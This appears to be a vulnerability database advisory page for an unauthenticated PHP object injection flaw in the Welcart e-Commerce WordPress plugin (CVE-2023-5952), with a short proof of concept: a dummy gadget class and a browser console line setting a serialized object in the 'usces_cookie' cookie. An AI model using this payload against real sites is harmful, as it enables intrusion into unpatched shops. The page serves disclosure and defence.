Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7HistoryNov 10, 2023 - 12:00 a.m.
Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection
2023-11-1000:00:00
Krzysztof Zając (CERT PL)
wpscan.com
4
welcart e-commerce
unauthenticated users
php object injection
cookie
web developer
gadget chain
blog security
Description The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog
PoC
To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then execute the command below in the web developer console of the browser when on the blog as unauthenticated: document.cookie=‘usces_cookie=O:4:“Evil”:0:{}’ Refresh the page to see the ‘Arbitrary deserialization’ message displayed
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.9.5 |
Related
cvelist
cvelist
wpexploit
wpexploit
Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection
2023-11-10 00:00:00
nvd
nvd
CVE-2023-5952
2023-12-04 22:15:08
prion
prion
Design/Logic Flaw
2023-12-04 22:15:00
cve
cve
CVE-2023-5952
2023-12-04 22:15:08
7.8 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
43.4%
Related for WPVDB-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7